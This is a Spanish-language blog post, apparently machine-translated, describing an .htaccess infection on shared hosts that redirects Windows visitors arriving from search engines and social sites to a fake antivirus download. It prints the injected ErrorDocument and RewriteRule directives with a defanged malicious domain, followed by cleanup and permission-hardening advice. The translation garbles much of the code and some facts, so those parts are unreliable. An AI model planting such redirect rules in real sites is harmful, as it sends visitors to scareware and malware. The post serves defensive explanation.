Malware / Virus - .htaccess "reescribir" y redireccionar

Una nueva forma de virus que yo no veo sé mucho afectar a los sitios alojados en servicios inseguros donde las cuentas de usuario / cuentas de subdominio se pueden "ver" entre ellos. Específicamente, todas las cuentas de alojamiento se colocan en la carpeta "vhosts", Y el derecho de escritura de carpeta de usuario de "vhosts" se le da a un usuario general ... por el revendedor en la mayoría de las situaciones. Es un método típico de servidores web que no utilizan WHM / cPanel.

Acción del virus .Htaccess - Hack de .htaccess

Virus afecta a los archivos .htaccess el sitio víctima. Las líneas se añaden / Directivas a redirigir los visitantes (provienen de yahoo, msn, google, facebook, yaindex, twitter, myspace, etc. sitios y portales de alto tráfico) a algunos sitios que ofrecen "antivirus“. Se trata de falso antivirus, Sobre la que escribí en la introducción de .

Esto es lo que se ve como una .htaccess afectadas: (no tener acceso a las direcciones URL de contenido por debajo de las líneas de)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine On

RewriteCond% {HTTP_REFERER}. * Yandex. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Odnoklassniki. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vkontakte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Rambler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Tube. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wikipedia. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Baidu. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Qq.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Twitter *. $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Facebook *. $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google *. $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Live. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Aol. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Amazon. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ebay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LinkedIn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Soso. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * DoubleClick. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pornhub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJournal. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. *wordpress.* $ [NC, O]
RewriteCond% {HTTP_REFERER}. * Yahoo. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pregunte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Altavista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Hotbot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Goto. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mamma. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Alltheweb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Buscar *. $ [NC, OR]
ReescribirCond %{HTTP_REFERER} .*metacrawler.*$ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Correo. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]

RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = r [R, L]

RewriteCond% {} REQUEST_FILENAME! -f
RewriteCond% {} REQUEST_FILENAME! -d
ReescribirCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = 4 [R, L]

Aquellos que usan WordPress encontrarán estas líneas en el archivo .htaccess de public_html. Además, el virus crea un archivo. Htaccess en la misma carpeta wp-content.

*También hay situaciones en las que aparece en lugar peoriavascularsurgery.com dns.thesoulfoodcafe.com u otras direcciones.

Lo que hace este virus.

Una vez redirigido, el visitante es recibido con los brazos abiertos por el mensaje:

¡Atención!
Su computadora contiene varios signos de presencia de virus y programas de malware. tu system requiere una comprobación antivirus inmediata!
System Security realizará un escaneo rápido y gratuito de su PC en busca de virus y programas maliciosos.

1 de malware

No importa qué botón presionemos, nos dirigiremos a la página "Mi PC", Creado para imitar XP diseño. Aquí es donde se inicia automáticamente el "proceso de escaneo", al final del cual descubrimos que "estamos infectados".

2 de malware

Después de hacer clic en Aceptar o Cancelar, se iniciará descargarFile setup.exe. Esta setup.exe es falso anti-virus afectar el sistema. Instale algunos de malware para propagar otros enlaces comprometidos, y además de estos un anti-virus software (también falso) que se invita a la víctima a comprar.
Los que se han puesto en contacto con el virus puede utilizar este formulario . También se recomienda para escanear el disco duro entero. Recomendar Kaspersky Internet Security o Kaspersky Anti-Virus.

Este tipo de virus afecta a los visitantes los sistemas operativos OS Windows XP, Windows Maine Windows 2000, Windows NT, Windows 98 si Windows 95. Hasta el momento no se conocen casos de infección de los sistemas operativos. Windows A la vista sí Windows 7.

¿Cómo se puede eliminar el archivo de virus. Htaccess en el servidor y cómo prevenir la infección.

1. Analizar los archivos sospechosos y los códigos de borrado. Para asegurarse de que el archivo no sólo se verá afectada .htaccess usted debe analizar todos los archivos . Php si . Js.

2. Vuelva a escribir el archivo. Htaccess y establecer el chmod 644 o 744 con acceso de escritura sólo propietario del usuario.

3. Al crear una cuenta de alojamiento de una página web en la carpeta / home o / Webroot Esto creará automáticamente una carpeta que tiene a menudo el nombre del usuario (usuario para cpanel, ftpEtc.). Para evitar que los datos de escritura y los virus de transmisión de un usuario a otro, se recomienda que cada carpeta de usuario que se establece:

chmod 644 o 744, se indica 755 – 644.
chown -R nombre de usuario nombre_carpeta.
chgrp-R nume_user nume_folder

ls-all maneras de comprobar si se hicieron correctamente. Debería aparecer algo como esto:

drwx - x - x 12 dinamics dinamics 4096 6 de mayo 14:51 dinamics /
drwx - x - x 10 duran duran 4096 7 de marzo 07:46 duran /
drwx - x - x 12 tubo de ensayo tubo de ensayo 4096 29 de enero 11:23 tubo de ensayo /
drwxr-xr-x 14 express express 4096 26 de febrero de 2009 express /
drwxr-xr-x 9 ezo ezo 4096 19 de mayo 01:09 ezo /
drwx - x - x 9 farma farma 4096 19 de diciembre 22:29 farma /

Si uno de los anteriores se userele FTP Los archivos infectadosNo se puede enviar el virus a otro host del usuario. Es una medida mínima de seguridad para proteger las cuentas alojadas en un servidor web.

Los elementos comunes de las zonas afectadas por este virus.

Todos los dominios afectados redirigen a los visitantes a sitios que contienen el nombre de dominio "/main.php? s = 4 & H".

Esto "virus. htaccess"Afecta a cualquier tipo de CMS (Joomla, WordPress, phpBBEtc) utilizando .htaccess

.htaccess Virus Hack & Redirect.

Fundador y editor Stealth Settings, desde 2006 hasta la actualidad. Experiencia en sistemas operativos. Linux (Especialmente CentOS), Mac OS X, Windows XP> Windows 10 si WordPress (CMS)

Cómo » AntiVirus y seguridad » Malware / Virus - .htaccess "reescribir" y redireccionar
Deja un comentario